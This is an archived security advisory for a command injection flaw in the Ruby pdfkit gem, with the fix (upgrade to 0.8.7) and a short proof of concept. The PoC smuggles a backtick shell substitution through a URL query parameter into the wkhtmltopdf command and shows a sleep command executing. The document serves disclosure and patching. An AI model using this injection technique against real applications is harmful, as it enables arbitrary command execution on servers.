๐
[ Archival Date ]
Dec 7, 2022 7:52 PM
โ ๏ธ [ ORIGIN SOURCE ]
๐ท๏ธ [ Tags ]
pdfkitruby
โ๏ธ [ Author ]
Benoit Cรดtรฉ-Jodoin
๐ฃ [ PoC / Exploit ]
INTRODUCED: 14 JUN 2022
How to fix?Upgradeย
pdfkitย to version 0.8.7 or higher.
Overview
Affected versions of this package are vulnerable to Command Injection where the URL is not properly sanitized.
PoC:
An application could be vulnerable if it tries to render a URL that contains query string parameters with user input:
PDFKit.new("http://example.com/?name=#{params[:name]}").to_pdfIf the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF:irb(main):060:0> puts PDFKit.new("http://example.com/?name=#{'%20`sleep 5`'}").command wkhtmltopdf --quiet [...] "http://example.com/?name=%20`sleep 5`" - => nilCalling to_pdf on the instance shows that the sleep command is indeed executing:
PDFKit.new("http://example.com/?name=#{'%20`sleep 5`'}").to_pdf
# 5 seconds wait...Of course, if the user can control completely the first argument of the PDFKit constructor, they can also exploit the command injection as long as it starts with "http":
PDFKit.new("http%20`sleep 5`").to_pdf